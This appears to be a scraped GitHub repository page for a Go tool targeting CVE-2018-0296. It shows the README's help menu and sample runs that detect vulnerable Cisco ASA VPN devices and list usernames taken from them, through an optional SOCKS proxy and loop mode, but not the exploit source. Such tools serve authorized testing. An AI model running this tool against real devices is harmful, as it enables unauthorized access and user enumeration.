CVE-2018-0296

Test CVE-2018-0296 and extract usernames from Cisco ASA.

Refer to https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/ for more technical details.

#Help Menu

$ ./CVE-2018-0296  -h
Options:

  -h, --help   display help information
  -u, --url    Url of target device
  -i           IP of Socks Proxy
  -p           Port of Socks Proxy
  -t, --time   Number of seconds to sleep between loop
      --loop   Loop mode

#Usage Guide

$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1

$ ./CVE-2018-0296 -u https://www.yahoo.com:443
[*] Checking: https://www.yahoo.com
[+] https://www.yahoo.com [NOT Cisco VPN]

$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x
[+] https://x.x.x.x [Cisco VPN]
[+] https://x.x.x.x [Vulnerable]
[*] No usernames found
  
$ ./CVE-2018-0296  -i 127.0.0.1 -p 10000 --loop 10 -u https://x.x.x.x:443
[*] Checking: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerable]
[*] Usernames found
testuser1

Name		Name	Last commit message	Last commit date
Latest commit History 18 Commits
.gitignore		.gitignore
CVE-2018-0296.go		CVE-2018-0296.go
README.md		README.md
goreleaser.yml		goreleaser.yml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

.gitignore

.gitignore

CVE-2018-0296.go

CVE-2018-0296.go

README.md

README.md

goreleaser.yml

goreleaser.yml

Repository files navigation

CVE-2018-0296

About

Releases

Packages

Languages

qiantu88/CVE-2018-0296

Folders and files

Latest commit

History

Repository files navigation

CVE-2018-0296

About

Resources

Stars

Watchers

Forks

Languages